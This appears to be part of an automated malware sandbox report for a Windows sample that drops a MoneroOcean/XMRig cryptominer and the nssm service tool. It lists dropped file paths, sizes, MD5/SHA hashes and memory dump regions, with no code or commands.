2200765d29a2bc88011d1c4509cadd0408154649206efb6495ab92ed29117709d698723660198c63a1b4b3433d612690bf6c1454d59c74a3f74a1f07a5c51fd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
280eb529a5aa2d9f7f74fc2470bdbe18

SHA1
aa4bbd477d6c571bb760af262ec1b6532dd84dc8

SHA256
f164d8c57a5734e0fb087a9d82f66a2a3c80453fe69eccc083f0e3ebe92b5f20

SHA512
1b69ccca6ce67e9aef7a01f0df8b15e6c16f77d21014748aa0b1eb45bcb0c8a0ca533961b412eb09d67b177babff1807368d4bf0b850108f98c45658c089ea74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8a424e81b5a6078deff05e153c04a0ee

SHA1
bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

SHA256
79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

SHA512
aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uqjlqgq4.uhx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6580.tmp.bat

Filesize
14KB

MD5
012a668bd1043d6b0a4bcd03d02ded41

SHA1
8595831d19a06d5ad38cb38b793eb1bdcc16b816

SHA256
57375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05

SHA512
e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c4a45df7238207ca30df2e58b38ecbaf

SHA1
27e66679d39588bdcb4e0a854713fadf3e91bd76

SHA256
80fb3b547547efbce73e7e65c2d1dcdb894fdd14e92cef6ceb8ec7cbe7ae2b30

SHA512
24d3099403af4759a2d564914d11506ae6a15b79a7abf3fcb5a81c06e16ba18776f4077df010296db0449edae2870f1c20d09aed21839eaf364a13dec005ac6f

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
2da13d49db90b934133aa15bcd492358

SHA1
8a8abc658cae1b0b659701c5a2b858f69dc7a717

SHA256
b0888d6fe5cd86f259780f5a4de58cc819b101c0f6433b4e22333b06491fa28d

SHA512
037ee082a76469ca1b5fd9df1ee299a4a9f149df2db550bf3eea0158f56eb5e5405838787b693b60b64847e4a14d466901f1b30380598e50f84de53012a03525

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
f33aa590e65df8a455ce81fcb7c4832c

SHA1
87294eafaee5eb28141f44a011591c908821b81a

SHA256
ab871e615f68f4ce861dc60e6cfd761daba4258dce25ca9a3244e6fa4e28c986

SHA512
27d73d8be35fb60a326e2b594bb71651004eb85e01bb7b058022a2138f38b72c8be39a20080edb4b6c08f76be428a565a97332999a1848e4c4dfd827d6627dd4

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/692-219-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-220-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-209-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-215-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-210-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-211-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-216-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-221-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-217-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/692-218-0x00000154235A0000-0x00000154235A1000-memory.dmp

Filesize
4KB

Download
memory/1392-16-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

Filesize
10.8MB

Download
memory/1392-11-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

Filesize
10.8MB

Download
memory/1392-12-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

Filesize
10.8MB

Download
memory/1392-0-0x00007FFE71AD3000-0x00007FFE71AD5000-memory.dmp

Filesize
8KB

Download
memory/1392-10-0x000001AA48F80000-0x000001AA48FA2000-memory.dmp

Filesize
136KB

Download
memory/1392-208-0x00007FFE71AD0000-0x00007FFE72591000-memory.dmp

Filesize
10.8MB

Download
memory/2328-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-200-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-199-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2328-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4840-66-0x0000000001330000-0x0000000001350000-memory.dmp

Filesize
128KB

Download
memory/4840-67-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5000-41-0x000001BA73DB0000-0x000001BA73DC2000-memory.dmp

Filesize
72KB

Download
memory/5000-40-0x000001BA73D80000-0x000001BA73D8A000-memory.dmp

Filesize
40KB

Download